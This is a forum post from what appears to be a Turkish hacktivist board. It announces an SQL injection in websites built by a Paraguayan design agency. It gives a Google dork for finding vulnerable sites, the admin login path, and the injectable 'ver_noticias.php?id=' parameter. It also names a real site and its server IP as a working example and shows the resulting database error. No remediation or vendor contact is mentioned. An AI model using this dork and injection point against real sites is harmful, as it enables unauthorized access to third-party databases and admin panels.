Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Diseño y Desarrollo Creadores Agencia Paraguay SQL Inj
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,377 / 1,377
Deneyim: 8 / 100
Rep Sayısı: 2785
Mesaj Sayısı: 6381
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Diseño y Desarrollo Creadores Agencia Paraguay SQL Inj
11.01.2019 03:08
##############################################################

# Exploit Title : Diseño y Desarrollo Creadores Agencia Paraguay SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/01/2019
# Vendor Homepage : creadores.com.py
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Diseño y Desarrollo: Creadores" site:py
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

##############################################################

# Admin Panel Login Path :
*************************
/admin/

# SQL Injection Exploit :
***********************

/ver_noticias.php?id=[SQL Injection]

##############################################################

# Example Vulnerable Site :
*************************

Note => (216.172.165.117) => There are 13 domains hosted on this server.

[+] gildaarrua.com/ver_noticias.php?id=43%27 =>

[ Proof of Concept ] => archive.fo/eAWS2

##############################################################

# SQL Database Error :
**********************
Warning: mysqli_fetch_array() expects parameter 1
to be mysqli_result, boolean given in /home/gildaarrua
/public_html/ver_noticias.php on line 82

##############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi